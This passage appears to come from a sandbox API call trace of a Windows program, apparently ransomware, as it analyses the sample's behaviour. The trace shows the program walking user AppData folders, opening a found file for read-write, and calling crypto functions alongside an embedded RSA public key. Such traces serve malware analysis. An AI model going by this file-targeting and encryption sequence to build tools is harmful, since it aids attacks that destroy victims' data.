hHeap=0x620000) returned 1 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0246.181] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\") returned="Search\\" [0246.181] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0246.181] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0246.181] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.181] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.181] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.181] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.181] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.181] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.181] PathFindFileNameW (pszPath="") returned="" [0246.181] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0246.212] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.212] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.212] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0246.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0246.213] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.213] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.213] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.213] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.213] PathFindFileNameW (pszPath="") returned="" [0246.213] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3397ae0 | out: hHeap=0x620000) returned 1 [0246.215] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.215] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="all", cAlternateFileName="")) returned 1 [0246.215] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brt", cAlternateFileName="")) returned 1 [0246.215] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brz", cAlternateFileName="")) returned 1 [0246.215] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dan", cAlternateFileName="")) returned 1 [0246.215] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dut", cAlternateFileName="")) returned 1 [0246.216] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eng", cAlternateFileName="")) returned 1 [0246.216] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="frn", cAlternateFileName="")) returned 1 [0246.216] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="grm", cAlternateFileName="")) returned 1 [0246.216] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="itl", cAlternateFileName="")) returned 1 [0246.216] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrw", cAlternateFileName="")) returned 1 [0246.216] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="prt", cAlternateFileName="")) returned 1 [0246.216] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spn", cAlternateFileName="")) returned 1 [0246.216] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 1 [0246.216] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 0 [0246.216] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fe38 | out: hHeap=0x620000) returned 1 [0246.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3397bb8 | out: hHeap=0x620000) returned 1 [0246.217] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.217] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\") returned="36USA68T\\" [0246.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0246.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0246.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0246.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.217] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.217] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.218] PathFindFileNameW (pszPath="") returned="" [0246.218] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.219] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.219] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 1 [0246.219] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned=".xml" [0246.219] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.219] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=13) returned 1 [0246.219] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.222] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.222] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0xd, lpOverlapped=0x0) returned 1 [0246.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.223] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.224] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.224] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.224] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.224] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.224] GetLastError () returned 0x0 [0246.224] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.224] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.224] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.224] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.224] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.224] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8aa68 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.225] GetCurrentThreadId () returned 0x5b4 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 